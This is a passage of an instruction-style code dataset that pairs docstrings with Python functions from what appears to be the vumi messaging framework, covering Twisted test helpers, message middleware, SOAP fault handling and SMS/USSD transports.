[/INST] def clear_dispatched_inbound(self, connector_name=None): + return self._clear_dispatched(connector_name, 'inbound') +[INST] Clear dispatched outbound messages for a connector.. [/INST] def clear_dispatched_outbound(self, connector_name=None): + return self._clear_dispatched(connector_name, 'outbound') +[INST] Clear dispatched statuses for a connector.. [/INST] def clear_dispatched_statuses(self, connector_name=None): + if connector_name is None: + connector_name = self._status_connector_name + return self._clear_dispatched(connector_name, 'status') +[INST] Dispatch a message to the specified routing key.. [/INST] def dispatch_raw(self, routing_key, message, exchange='vumi'): + self.broker.publish_message(exchange, routing_key, message) + return self.kick_delivery() +[INST] Trigger delivery of messages by the broker. +This is generally called internally by anything that sends a message.. [/INST] def kick_delivery(self): + return self.broker.kick_delivery() +[INST] Get dispatched metrics after waiting for any pending deliveries. +The list of datapoints from each dispatched metrics message is +returned.. [/INST] def wait_for_dispatched_metrics(self): + return self.broker.wait_delivery().addCallback( + lambda _: self.get_dispatched_metrics()) +[INST] Clear dispatched metrics messages from the broker.. [/INST] def clear_dispatched_metrics(self): + self.broker.clear_messages('vumi.metrics') +[INST] Construct and dispatch a delivery report event. +This is a wrapper around :meth:`MessageHelper.make_delivery_report` (to +which all parameters are passed) and. 
[/INST] def make_dispatch_delivery_report(self, *args, **kw): + msg = self.msg_helper.make_delivery_report(*args, **kw) + d = self.worker_helper.dispatch_event(msg) + return d.addCallback(lambda r: msg) +[INST] Construct and dispatch a status. +This is a wrapper around :meth:`MessageHelper.make_status` (to +which all parameters are passed) and. [/INST] def make_dispatch_status(self, *args, **kw): + msg = self.msg_helper.make_status(*args, **kw) + d = self.worker_helper.dispatch_status(msg) + return d.addCallback(lambda r: msg) +[INST] This is useful for skipping tests that require optional dependencies which +might not be present.. [/INST] def import_skip(exc, *expected): + module = import_filter(exc, *expected) + raise SkipTest("Failed to import '%s'." % (module,)) +[INST] Decorate a test that should be skipped with a reason. +NOTE: Don't import this as `skip`, because that will cause trial to skip +the entire module that imports it.. [/INST] def skiptest(reason): + def skipdeco(func): + func.skip = reason + return func + return skipdeco +[INST] Return ``value`` or a deferred that fires with it. +This is useful in cases where we're performing a potentially async +operation but don't necessarily have enough information to use +`maybe_async`.. [/INST] def maybe_async_return(value, maybe_deferred): + if isinstance(maybe_deferred, Deferred): + return maybe_deferred.addCallback(lambda r: value) + return value +[INST] Get a list of Riak managers and whether they should be purged. +The return value is a list of (`bool`, `Manager`) tuples. If the first +item is `True`, the manager should be purged. It's safe to purge +managers even if the first item is `False`, but it adds extra cleanup +time.. [/INST] def _get_riak_managers_for_cleanup(self): + seen_bucket_prefixes = set() + managers = [] + for manager in self._riak_managers: + if manager.bucket_prefix in seen_bucket_prefixes: + managers.append((False, manager)) + else: + seen_bucket_prefixes.add(manager.bucket_prefix) + managers.append((True, manager)) + return reversed(managers) +[INST] Get a list of Redis managers and whether they should be purged. +The return value is a list of (`bool`, `Manager`) tuples. If the first +item is `True`, the manager should be purged. It's safe to purge +managers even if the first item is `False`, but it adds extra cleanup +time.. [/INST] def _get_redis_managers_for_cleanup(self): + seen_key_prefixes = set() + managers = [] + for manager in self._redis_managers: + if manager._key_prefix in seen_key_prefixes: + managers.append((False, manager)) + else: + seen_key_prefixes.add(manager._key_prefix) + managers.append((True, manager)) + return reversed(managers) +[INST] This is a separate method to allow easy overriding.. [/INST] def _purge_redis(self, manager): + try: + yield manager._purge_all() + except RuntimeError, e: + if e.args[0] != 'Not connected': + raise +[INST] Patch a Riak manager to capture load and store operations.. [/INST] def record_load_and_store(self, riak_manager, loads, stores): + orig_load = riak_manager.load + orig_store = riak_manager.store + def record_load(modelcls, key, result=None): + loads.append(key) + return orig_load(modelcls, key, result=result) + def record_store(obj): + stores.append(obj.key) + return orig_store(obj) + self._patch(riak_manager, "load", record_load) + self._patch(riak_manager, "store", record_store) +[INST] All configs for things that create Riak or Redis clients should be +passed through this method.. 
[/INST] def mk_config(self, config): + self._check_patches_applied() + config = config.copy() + config.update(self._config_overrides) + return config +[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self): + self.web_path = self.config['web_path'] + self.web_port = int(self.config['web_port']) + self.integrat_url = self.config['url'] + self.integrat_username = self.config['username'] + self.integrat_password = self.config['password'] + self.transport_type = self.config.get('transport_type', 'ussd') +[INST] Call .send_to() for a message from RapidSMS that is not a reply. +This is for overriding by sub-classes that need to add additional +message options.. [/INST] def send_rapidsms_nonreply(self, to_addr, content, config, endpoint): + return self.send_to(to_addr, content, endpoint=endpoint) +[INST] Do any necessary computation when a field changes.. [/INST] def model_field_changed(self, modelobj, changed_field_name): + pass +[INST] Perform a paginated index query for backlinked objects.. [/INST] def reverse_lookup_keys_paginated(self, modelobj, manager=None, + max_results=None, continuation=None): + if manager is None: + manager = modelobj.manager + return manager.index_keys_page( + self.model_cls, self.index_name, modelobj.key, + max_results=max_results, continuation=continuation) +[INST] Publishes a status if it is not a repeat of the previously +published status.. [/INST] def add_status(self, **kw): + if self.status_detect.check_status(**kw): + yield self.publish_status(**kw) +[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message): + request_id = message['in_reply_to'] + request = self.get_request(request_id) + builder = self.infer_message_type(message) + wc_msg = builder(message) + if request is None or request.finished: + return self.push_message(wc_msg, message) + request.write(wc_msg.to_xml()) + request.finish() + d = self.publish_ack(user_message_id=message['message_id'], + sent_message_id=message['message_id']) + wc_metadata = message["transport_metadata"].get('wechat', {}) + if wc_metadata: + d.addCallback(lambda _: self.set_cached_reply( + wc_metadata['MsgId'], wc_msg.to_xml())) + if message['session_event'] == TransportUserMessage.SESSION_CLOSE: + d.addCallback( + lambda _: self.clear_addr_mask(wc_msg.to_user_name)) + return d +[INST] Construct a real webserver to test actual connectivity.. [/INST] def make_real_webserver(self): + root = Resource() + root.isLeaf = True + root.render = lambda r: self._render_request(r) + site_factory = Site(root) + webserver = yield reactor.listenTCP( + 0, site_factory, interface='127.0.0.1') + self.add_cleanup(webserver.loseConnection) + addr = webserver.getHost() + url = "http://%s:%s/" % (addr.host, addr.port) + returnValue(url) +[INST] Wrapper around http_request_full and friends that injects our fake +connection's agent.. [/INST] def with_agent(self, f, *args, **kw): + kw.setdefault('agent_class', self.fake_http.get_agent) + return f(*args, **kw) +[INST] Called when an inbound transport user message is consumed. +The other methods listed below all function in the same way. Only the +kind and direction of the message being processed differs.. [/INST] def handle_consume_inbound(self, message, connector_name): + return self.handle_inbound(message, connector_name) +[INST] Called when an inbound transport user message is published.. 
[/INST] def handle_publish_inbound(self, message, connector_name): + return self.handle_inbound(message, connector_name) +[INST] Default handler for published and consumed inbound messages.. [/INST] def handle_inbound(self, message, connector_name): + return message +[INST] Called when an outbound transport user message is consumed.. [/INST] def handle_consume_outbound(self, message, connector_name): + return self.handle_outbound(message, connector_name) +[INST] Called when an outbound transport user message is published.. [/INST] def handle_publish_outbound(self, message, connector_name): + return self.handle_outbound(message, connector_name) +[INST] Default handler for published and consumed outbound messages.. [/INST] def handle_outbound(self, message, connector_name): + return message +[INST] Called when a transport event is consumed.. [/INST] def handle_consume_event(self, event, connector_name): + return self.handle_event(event, connector_name) +[INST] Called when a transport event is published.. [/INST] def handle_publish_event(self, event, connector_name): + return self.handle_event(event, connector_name) +[INST] Default handler for published and consumed events.. [/INST] def handle_event(self, event, connector_name): + return event +[INST] Called when a failure message is consumed.. [/INST] def handle_consume_failure(self, failure, connector_name): + return self.handle_failure(failure, connector_name) +[INST] Called when a failure message is published.. [/INST] def handle_publish_failure(self, failure, connector_name): + return self.handle_failure(failure, connector_name) +[INST] Called to process a failure message (. [/INST] def handle_failure(self, failure, connector_name): + return failure +[INST] Return a list of middleware objects created from a worker +configuration.. [/INST] def create_middlewares_from_config(worker, config): + middlewares = [] + for item in config.get("middleware", []): + keys = item.keys() + if len(keys) != 1: + raise ConfigError( + "Middleware items contain only a single key-value pair. The" + " key should be a name for the middleware. The value should be" + " the full dotted name of the class implementing the" + " middleware, or a mapping containing the keys 'class' with a" + " value of the full dotted class name, 'consume_priority' with" + " the priority level for consuming, and 'publish_priority'" + " with the priority level for publishing, both integers.") + middleware_name = keys[0] + middleware_config = config.get(middleware_name, {}) + if isinstance(item[middleware_name], basestring): + cls_name = item[middleware_name] + middleware_config['consume_priority'] = 0 + middleware_config['publish_priority'] = 0 + elif isinstance(item[middleware_name], dict): + conf = item[middleware_name] + cls_name = conf.get('class') + try: + middleware_config['consume_priority'] = int(conf.get( + 'consume_priority', 0)) + middleware_config['publish_priority'] = int(conf.get( + 'publish_priority', 0)) + except ValueError: + raise ConfigError( + "Middleware priority level must be an integer") + else: + raise ConfigError( + "Middleware item values must either be a string with the" + " full dotted name of the class implementing the middleware," + " or a dictionary with 'class', 'consume_priority', and" + " 'publish_priority' keys.") + cls = load_class_by_string(cls_name) + middleware = cls(middleware_name, middleware_config, worker) + middlewares.append(middleware) + return middlewares +[INST] Add a pool to the list of pools..
[/INST] def _register_pool(self, pool): + pool = self._encode(pool) + pool_list_key = self._pool_list_key() + yield self.redis.sadd(pool_list_key, pool) +[INST] Remove a pool to list of pools.. [/INST] def _unregister_pool(self, pool): + pool = self._encode(pool) + pool_list_key = self._pool_list_key() + yield self.redis.srem(pool_list_key, pool) +[INST] Generic response for abnormal server side errors.. [/INST] def response_for_error(self): + response = { + 'message': 'We encountered an error while processing your message', + 'type': 'end' + } + return response +[INST] Called on requests that timed out.. [/INST] def finish_expired_request(self, request_id, request): + del self._requests[request_id] + log.msg('Timing out on response for %s' % request.session['from_addr']) + request.deferred.callback(self.response_for_error()) +[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self): + self.message_id_lifetime = self.config.get('message_id_lifetime', + self.DEFAULT_MESSAGE_ID_LIFETIME) + self.web_receipt_path = self.config['web_receipt_path'] + self.web_receive_path = self.config['web_receive_path'] + self.web_port = int(self.config['web_port']) + self.opera_url = self.config['url'] + self.opera_channel = self.config['channel'] + self.opera_password = self.config['password'] + self.opera_service = self.config['service'] + self.max_segments = self.config.get('max_segments', 9) + self.r_config = self.config.get('redis_manager', {}) + self.transport_name = self.config['transport_name'] +[INST] Decide what to do on certain failure cases.. [/INST] def handle_outbound_message_failure(self, failure, message): + if failure.check(xmlrpc.Fault): + raise TemporaryFailure(failure) + elif failure.check(ValueError): + yield self.publish_nack(message['message_id'], str(failure.value)) + raise PermanentFailure(failure) + else: + yield self.publish_nack(message['message_id'], str(failure.value)) + raise failure +[INST] Clean-up of setup done in setup_dispatcher should happen here.. [/INST] def teardown_dispatcher(self): + pass +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function(obj): + obj.a = obj.a + u"-modified" + return True +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_deferred(obj): + from twisted.internet import reactor + return deferLater(reactor, 0.1, post_migrate_function, obj) +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_new_only(obj): + if obj.was_migrated: + return post_migrate_function(obj) + return False +[INST] Get the fully-qualified name of a thing.. [/INST] def fqpn(thing): + return ".".join([thing.__module__, thing.__name__]) +[INST] This is a drop in replacement for the original `http_request_full` method +but it has its internals completely replaced by treq. Treq supports SNI +and our implementation does not for some reason. Also, we do not want +to continue maintaining this because we're favouring treq everywhere +anyway.. 
[/INST] def http_request_full(url, data=None, headers={}, method='POST', + timeout=None, data_limit=None, context_factory=None, + agent_class=None, reactor=None): + agent_class = agent_class or Agent + if reactor is None: + from twisted.internet import reactor + kwargs = {'pool': HTTPConnectionPool(reactor, persistent=False)} + if context_factory is not None: + kwargs['contextFactory'] = context_factory + agent = agent_class(reactor, **kwargs) + client = HTTPClient(agent) + def handle_response(response): + return SimplishReceiver(response, data_limit).deferred + d = client.request(method, url, headers=headers, data=data) + d.addCallback(handle_response) + if timeout is not None: + cancelling_on_timeout = [False] + def raise_timeout(reason): + if not cancelling_on_timeout[0] or reason.check(HttpTimeoutError): + return reason + return Failure(HttpTimeoutError("Timeout while connecting")) + def cancel_on_timeout(): + cancelling_on_timeout[0] = True + d.cancel() + def cancel_timeout(r, delayed_call): + if delayed_call.active(): + delayed_call.cancel() + return r + d.addErrback(raise_timeout) + delayed_call = reactor.callLater(timeout, cancel_on_timeout) + d.addCallback(cancel_timeout, delayed_call) + return d +[INST] Checks to see if the current status is a repeat. If it is, None is +returned. If it isn't, the status is returned.. [/INST] def check_status(self, **status): + self._check_state(status['status'], status['component']) + if self._check_type(status['type'], status['component']): + return status +[INST] Count keys in an index page, filtering by regex if necessary.. [/INST] def count_keys(self, keys, filter_regex): + if filter_regex is not None: + keys = [(v, k) for v, k in keys if filter_regex.match(v)] + return len(keys) +[INST] Perform an index query to get all keys and count them.. [/INST] def count_all_keys(self): + self.emit("Counting all keys ...") + index_page = yield self.model.all_keys_page( + max_results=self.options["index-page-size"]) + yield self.count_pages(index_page, filter_regex=None) +[INST] Perform an index query to get all matching keys and count them.. [/INST] def count_index_keys(self): + filter_regex = self.options["index-value-regex"] + if filter_regex is not None: + filter_regex = re.compile(filter_regex) + self.emit("Counting ...") + index_page = yield self.model.index_keys_page( + field_name=self.options["index-field"], + value=self.options["index-value"], + end_value=self.options["index-value-end"], + max_results=self.options["index-page-size"], + return_terms=True) + yield self.count_pages(index_page, filter_regex=filter_regex) +[INST] handle messages arriving over AMQP meant for delivery via vas2nets. 
[/INST] def handle_outbound_message(self, message): + params = { + 'username': self.config['username'], + 'password': self.config['password'], + 'owner': self.config['owner'], + 'service': self.config['service'], + } + v2n_message_id = message.get('in_reply_to') + if v2n_message_id is not None: + if v2n_message_id.startswith(self.transport_name): + v2n_message_id = v2n_message_id[len(self.transport_name) + 1:] + else: + v2n_message_id = message['message_id'] + message_params = { + 'call-number': normalize_outbound_msisdn(message['to_addr']), + 'origin': message['from_addr'], + 'messageid': v2n_message_id, + 'provider': message['transport_metadata']['network_id'], + 'tariff': message['transport_metadata'].get('tariff', 0), + 'text': validate_characters(message['content']), + 'subservice': self.config.get('subservice', + message['transport_metadata'].get( + 'keyword', '')), + } + params.update(message_params) + log.msg('Hitting %s with %s' % (self.config['url'], params)) + log.msg(urlencode(params)) + try: + response = yield http_request_full( + self.config['url'], urlencode(params), { + 'User-Agent': ['Vumi Vas2Net Transport'], + 'Content-Type': ['application/x-www-form-urlencoded'], + }, 'POST', agent_class=self.agent_factory) + except ConnectionRefusedError: + log.msg("Connection failed sending message:", message) + raise TemporaryFailure('connection refused') + log.msg('Headers', list(response.headers.getAllRawHeaders())) + header = self.config.get('header', 'X-Nth-Smsid') + if response.code != 200: + raise PermanentFailure('server error: HTTP %s: %s' + % (response.code, response.delivered_body)) + if response.headers.hasHeader(header): + transport_message_id = response.headers.getRawHeaders(header)[0] + yield self.publish_ack( + user_message_id=message['message_id'], + sent_message_id=transport_message_id, + ) + else: + err_msg = 'No SmsId Header, content: %s' % response.delivered_body + yield self.publish_nack( + user_message_id=message['message_id'], + sent_message_id=message['message_id'], + reason=err_msg) + raise Vas2NetsTransportError(err_msg) +[INST] Store this failure in redis, with an optional retry delay.. [/INST] def store_failure(self, message, reason, retry_delay=None): + message_json = message + if not isinstance(message, basestring): + message_json = to_json(message) + key = self.failure_key() + if not retry_delay: + retry_delay = 0 + yield self.redis.hmset(key, { + "message": message_json, + "reason": reason, + "retry_delay": str(retry_delay), + }) + yield self.add_to_failure_set(key) + if retry_delay: + yield self.store_retry(key, retry_delay) + returnValue(key) +[INST] Handle a failed message from a transport.. [/INST] def handle_failure(self, message, failure_code, reason): + if failure_code == FailureMessage.FC_TEMPORARY: + return self.do_retry(message, reason) + else: + return self.store_failure(message, reason) +[INST] Asserts that the JSON response we're getting back is the same as +the list of messages provided. + +There are easier ways to do this by comparing bigger JSON blogs +but then debugging the huge strings would be a pain.. 
[/INST] def assertJSONResultEqual(self, json_blob, messages): + dictionaries = json.loads(json_blob) + self.assertEqual(len(dictionaries), len(messages), + 'Unequal amount of dictionaries and messages') + for dictionary, message in zip(dictionaries, messages): + self.assertEqual( + TransportUserMessage(_process_fields=False, **message.payload), + TransportUserMessage.from_json(json.dumps(dictionary))) +[INST] Wait zero seconds to give the reactor a chance to work. +Returns its (optional) argument, so it's useful as a callback.. [/INST] def wait0(r=None): + from twisted.internet import reactor + return deferLater(reactor, 0, lambda: r) +[INST] Write some bytes and allow the reactor to send them.. [/INST] def write(self, data): + self.transport.write(data) + return wait0() +[INST] Get an endpoint that connects clients to this server.. [/INST] def endpoint(self): + return FakeServerEndpoint(self) +[INST] Wait for a client to start connecting, and then return a. [/INST] def await_connection(self): + return self.connection_queue.get() +[INST] Wait for a client to finish connecting.. [/INST] def await_connected(self): + return self._connected_d +[INST] Wait for the both sides of the connection to close.. [/INST] def await_finished(self): + return self._finished_d +[INST] Patch the protocol's makeConnection and connectionLost methods to make the +protocol and its transport behave more like what `Agent` expects. + +While `Agent` is the driving force behind this, other clients and servers +will no doubt have similar requirements.. [/INST] def patch_protocol_for_agent(protocol): + old_makeConnection = protocol.makeConnection + old_connectionLost = protocol.connectionLost + def new_makeConnection(transport): + patch_transport_fake_push_producer(transport) + patch_transport_abortConnection(transport, protocol) + return old_makeConnection(transport) + def new_connectionLost(reason): + if protocol._fake_connection_aborted and reason.check(ConnectionDone): + reason = Failure(ConnectionAborted()) + return old_connectionLost(reason) + protocol.makeConnection = new_makeConnection + protocol.connectionLost = new_connectionLost + protocol._fake_connection_aborted = False +[INST] Patch a method onto an object if it isn't already there.. [/INST] def patch_if_missing(obj, name, method): + setattr(obj, name, getattr(obj, name, method)) +[INST] Patch the three methods belonging to IPushProducer onto the transport if it +doesn't already have them. (`Agent` assumes its transport has these.). [/INST] def patch_transport_fake_push_producer(transport): + patch_if_missing(transport, 'pauseProducing', lambda: None) + patch_if_missing(transport, 'resumeProducing', lambda: None) + patch_if_missing(transport, 'stopProducing', transport.loseConnection) +[INST] Patch abortConnection() on the transport or add it if it doesn't already +exist (`Agent` assumes its transport has this). + +The patched method sets an internal flag recording the abort and then calls +the original method (if it existed) or transport.loseConnection (if it +didn't).. [/INST] def patch_transport_abortConnection(transport, protocol): + _old_abortConnection = getattr( + transport, 'abortConnection', transport.loseConnection) + def abortConnection(): + protocol._fake_connection_aborted = True + _old_abortConnection() + transport.abortConnection = abortConnection +[INST] Called if the SMPP connection is not bound within +``smpp_bind_timeout`` amount of seconds. 
[/INST] def drop_link(self): + if self.is_bound(): + return + yield self.service.on_smpp_bind_timeout() + yield self.disconnect( + 'Dropping link due to binding delay. Current state: %s' % ( + self.state)) +[INST] Send a PDU to the SMSC. [/INST] def send_pdu(self, pdu): + self.emit('OUTGOING >> %r' % (pdu.get_obj(),)) + return self.transport.write(pdu.get_bin()) +[INST] Called when an SMPP PDU is received for which no handler function has +been defined.. [/INST] def on_unsupported_command_id(self, pdu): + self.log.warning( + 'Received unsupported SMPP command_id: %r' % (command_id(pdu),)) +[INST] Called when the bind has been set up. [/INST] def on_smpp_bind(self, sequence_number): + self.drop_link_call.cancel() + self.disconnect_call = self.clock.callLater( + self.idle_timeout, self.disconnect, + 'Disconnecting, no response from SMSC for longer ' + 'than %s seconds' % (self.idle_timeout,)) + self.enquire_link_call.clock = self.clock + self.enquire_link_call.start(self.config.smpp_enquire_link_interval) + return self.service.on_smpp_bind() +[INST] Format a datetime object using the Vumi date format.. [/INST] def format_vumi_date(timestamp): + return timestamp.strftime(VUMI_DATE_FORMAT) +[INST] Parse a timestamp string using the Vumi date format. +Timestamps without microseconds are also parsed correctly.. [/INST] def parse_vumi_date(value): + date_format = VUMI_DATE_FORMAT + if "." not in value[-10:]: + date_format = _VUMI_DATE_FORMAT_NO_MICROSECONDS + return datetime.strptime(value, date_format) +[INST] A special payload attribute that isn't stored by the message store.. [/INST] def cache(self): + return self.payload.setdefault(self._CACHE_ATTRIBUTE, {}) +[INST] Construct a reply message. +The reply message will have its `to_addr` field set to the original +message's `from_addr`. This means that even if the original message is +directed to the group only, the +reply will be directed to the sender of the original message.. [/INST] def reply(self, content, continue_session=True, **kw): + session_event = None if continue_session else self.SESSION_CLOSE + for field in [ + 'to_addr', 'from_addr', 'group', 'in_reply_to', 'provider', + 'transport_name', 'transport_type', 'transport_metadata']: + if field in kw: + raise TypeError("'%s' may not be overridden." % (field,)) + fields = { + 'helper_metadata': self['helper_metadata'], + 'session_event': session_event, + 'to_addr': self['from_addr'], + 'from_addr': self['to_addr'], + 'group': self['group'], + 'in_reply_to': self['message_id'], + 'provider': self['provider'], + 'transport_name': self['transport_name'], + 'transport_type': self['transport_type'], + 'transport_metadata': self['transport_metadata'], + } + fields.update(kw) + out_msg = TransportUserMessage(content=content, **fields) + out_msg.set_routing_endpoint(self.get_routing_endpoint()) + return out_msg +[INST] Messages sent to the bot will arrive here. Command handling routing +is done in this function.. [/INST] def onMessage(self, message): + if not isinstance(message.body, DomishElement): + return None + text = unicode(message.body).encode('utf-8').strip() + from_addr, _, _ = message['from'].partition('/') + self.message_callback( + to_addr=self.jid.userhost(), + from_addr=from_addr, + content=text, + transport_type='xmpp', + transport_metadata={ + 'xmpp_id': message.getAttribute('id'), + }) +[INST] Perform a SOAP request. 
+If the remote server responds with an HTTP 500 status, then it is assumed +that the body contains a SOAP fault, which is then parsed and a `SoapFault` +exception raised.. [/INST] def perform_soap_request(uri, action, body, header=None, + expected_faults=None, + http_request_full=http_request_full): + def _parse_soap_response(response): + root = fromstring(response.delivered_body) + body, header = unwrap_soap_envelope(root) + if response.code == http.INTERNAL_SERVER_ERROR: + raise SoapFault.from_element(body, expected_faults) + return body, header + envelope = soap_envelope(body, header) + headers = { + 'SOAPAction': action, + 'Content-Type': 'text/xml; charset="utf-8"'} + d = http_request_full(uri, tostring(envelope), headers) + d.addCallback(_parse_soap_response) + return d +[INST] Wrap an element or text in a SOAP envelope.. [/INST] def soap_envelope(body, header=None): + parts = [SOAP_ENV.Body(body)] + if header is not None: + parts.insert(0, SOAP_ENV.Header(header)) + return SOAP_ENV.Envelope(*parts) +[INST] Unwrap a SOAP request and return the SOAP header and body elements.. [/INST] def unwrap_soap_envelope(root): + header = elemfind(root, SOAP_ENV.Header) + body = elemfind(root, SOAP_ENV.Body) + if body is None: + raise SoapFault(u'soapenv:Client', u'Malformed SOAP request') + return body, header +[INST] Create a SOAP fault response.. [/INST] def soap_fault(faultcode, faultstring=None, faultactor=None, detail=None): + def _maybe(f, value): + if value is not None: + return f(value) + return None + xs = [ + LocalNamespace.faultcode(faultcode), + _maybe(LocalNamespace.faultstring, faultstring), + _maybe(LocalNamespace.faultactor, faultactor), + _maybe(LocalNamespace.detail, detail)] + return SOAP_ENV.Fault(*[x for x in xs if x is not None]) +[INST] Parse expected SOAP faults from a SOAP fault ``detail`` element.. [/INST] def _parse_expected_faults(detail, expected_faults): + if detail is None: + return None + for child in detail.getchildren(): + for exc_type in expected_faults: + try: + if exc_type.detail_type is not None: + det = exc_type.detail_type.from_element(child) + if det is not None: + return exc_type, det + except: + log.err( + None, 'Error parsing SOAP fault element (%r) with %r' % ( + child, exc_type.detail_type)) + return None +[INST] Parse a SOAP fault element and its details.. [/INST] def parse_soap_fault(body, expected_faults=None): + fault = elemfind(body, SOAP_ENV.Fault) + if fault is None: + return None + faultcode = gettext(fault, u'faultcode') + faultstring = gettext(fault, u'faultstring') + faultactor = gettext(fault, u'faultactor') + detail = elemfind(fault, u'detail') + if expected_faults is None: + expected_faults = [] + parsed = _parse_expected_faults(detail, expected_faults) + return parsed, (faultcode, faultstring, faultactor, detail) +[INST] Parse a SOAP fault from an ElementTree element.. [/INST] def from_element(cls, root, expected_faults=None): + faultinfo = parse_soap_fault(root, expected_faults) + if faultinfo is None: + raise ValueError( + 'Element (%r) does not contain a SOAP fault' % (root,)) + parsed_fault, faultinfo = faultinfo + if parsed_fault is None: + parsed_fault = SoapFault, None + exc_type, parsed_detail = parsed_fault + faultcode, faultstring, faultactor, detail = faultinfo + return exc_type( + faultcode, faultstring, faultactor, detail, parsed_detail) +[INST] Serialize this SOAP fault to an ElementTree element.. 
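+For reference, a stdlib-only sketch of the fault XML these helpers build and parse; the real code uses the module's SOAP_ENV and LocalNamespace element makers, so the element construction here is illustrative.
+ import xml.etree.ElementTree as ET
+
+ SOAP_NS = 'http://schemas.xmlsoap.org/soap/envelope/'
+ fault = ET.Element('{%s}Fault' % SOAP_NS)
+ ET.SubElement(fault, 'faultcode').text = 'soapenv:Client'
+ ET.SubElement(fault, 'faultstring').text = 'Malformed SOAP request'
+ print(ET.tostring(fault, encoding='unicode'))  # single-line Fault element with faultcode and faultstring children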
[/INST] def to_element(self): + detail = self.detail + if detail is not None: + detail = self.detail.getchildren() + return soap_fault( + self.code, self.string, self.actor, detail) +[INST] Clean-up of setup done in setup_transport.. [/INST] def teardown_transport(self): + self.session_manager.stop() + if self.xmlrpc_server is not None: + yield self.xmlrpc_server.stopListening() +[INST] Called by the XML-RPC server when it receives a payload that +needs processing.. [/INST] def handle_raw_inbound_request(self, message_id, values, d): + self.timeout_request = self.callLater(self.timeout, + self.timed_out, message_id) + self._requests[message_id] = values + self._requests_deferreds[message_id] = d + if not self.validate_inbound_data(values.keys()): + self.timeout_request.cancel() + self.remove_request(message_id) + d.errback(InvalidRequest("4001: Missing Parameters")) + else: + session_id = values['TransactionId'] + session = yield self.session_manager.load_session(session_id) + if session: + session_event = TransportUserMessage.SESSION_RESUME + content = values['USSDRequestString'] + else: + yield self.session_manager.create_session( + session_id, from_addr=values['MSISDN'], + to_addr=values['USSDServiceCode']) + session_event = TransportUserMessage.SESSION_NEW + content = None + metadata = { + 'transaction_id': values['TransactionId'], + 'transaction_time': values['TransactionTime'], + } + res = yield self.publish_message( + message_id=message_id, + content=content, + from_addr=values['MSISDN'], + to_addr=values['USSDServiceCode'], + session_event=session_event, + transport_type=self.transport_type, + transport_metadata={'mtn_rwanda_ussd': metadata} + ) + returnValue(res) +[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message): + request_id = message['in_reply_to'] + if self.get_request(request_id) is None: + return self.publish_nack(user_message_id=message['message_id'], + sent_message_id=message['message_id'], + reason='Request not found') + self.timeout_request.cancel() + self.finish_request(request_id, + message.payload['content'].encode('utf-8'), + message['session_event']) + return self.publish_ack(user_message_id=request_id, + sent_message_id=request_id) +[INST] Create a client connection to a fake server.. [/INST] def connect_client(self, fake_server): + conn_d = fake_server.await_connection() + self.assertNoResult(conn_d) + client_d = fake_server.endpoint.connect(self.client_factory) + client = self.successResultOf(client_d) + conn = self.successResultOf(conn_d) + self.assert_connected(conn, client) + return (conn, client) +[INST] Assert that a connection is not yet connected.. [/INST] def assert_pending(self, conn): + self.assertEqual(conn.client_protocol, None) + self.assertEqual(conn.server_protocol, None) + self.assertEqual(conn.connected, False) + self.assertEqual(conn.pending, True) + self.assertNoResult(conn._accept_d) + self.assertNoResult(conn._connected_d) + self.assertNoResult(conn._finished_d) +[INST] Assert that a connection is connected to a client.. 
[/INST] def assert_connected(self, conn, client): + self.assertIsInstance(conn.client_protocol, DummyClientProtocol) + self.assertEqual(conn.client_protocol.side, "client") + self.assertEqual(conn.client_protocol.connected, True) + self.assertEqual(conn.client_protocol.disconnected_reason, None) + self.assertIsInstance(conn.server_protocol, DummyServerProtocol) + self.assertEqual(conn.server_protocol.side, "server") + self.assertEqual(conn.server_protocol.connected, True) + self.assertEqual(conn.server_protocol.disconnected_reason, None) + self.assertEqual(conn.connected, True) + self.assertEqual(conn.pending, False) + self.successResultOf(conn._accept_d) + self.successResultOf(conn._connected_d) + self.assertNoResult(conn._finished_d) + self.assertEqual(conn.client_protocol, client) +[INST] Start a match operation. Expects the query to be POSTed +as the raw HTTP POST data. + +The query is a list of dictionaries. A dictionary should have the +structure as defined in `vumi.persist.model.Model.index_match` + +The results of the query are stored fo limited time. It defaults +to `MessageStoreCache.DEFAULT_SEARCH_RESULT_TTL` but can be overriden +by specifying the TTL in seconds using the header key as specified +in `REQ_TTL_HEADER`. + +If the request has the `REQ_WAIT_HEADER` value equals `1` (int) +then it will only return with a response when the keys are actually +available for collecting.. [/INST] def render_POST(self, request): + query = json.loads(request.content.read()) + headers = request.requestHeaders + ttl = int(headers.getRawHeaders(self.REQ_TTL_HEADER, [0])[0]) + if headers.hasHeader(self.REQ_WAIT_HEADER): + wait = bool(int(headers.getRawHeaders(self.REQ_WAIT_HEADER)[0])) + else: + wait = False + deferred = self._match_cb(query, ttl=(ttl or None), wait=wait) + deferred.addCallback(self._render_token, request) + return NOT_DONE_YET +[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs): + return defer.fail(xmlrpc.Fault(503, 'oh noes!')) +[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs): + return defer.fail(ValueError(402, 'Payment Required')) +[INST] Stop attempting to reconnect and close any existing connections.. [/INST] def stopService(self): + self.continueTrying = False + waitFor = [] + if self._delayedRetry is not None and self._delayedRetry.active(): + self._delayedRetry.cancel() + self._delayedRetry = None + if self._connectingDeferred is not None: + waitFor.append(self._connectingDeferred) + self._connectingDeferred.cancel() + self._connectingDeferred = None + if self._protocol is not None: + self._protocolStoppingDeferred = Deferred() + waitFor.append(self._protocolStoppingDeferred) + self._protocol.transport.loseConnection() + d = gatherResults(waitFor) + return d.addCallback(lambda _: Service.stopService(self)) +[INST] Have this connector connect again, after a suitable delay.. [/INST] def retry(self, delay=None): + if not self.continueTrying: + if self.noisy: + log.msg("Abandoning %s on explicit request" % (self.endpoint,)) + return + if self.maxRetries is not None and (self.retries >= self.maxRetries): + if self.noisy: + log.msg("Abandoning %s after %d retries." 
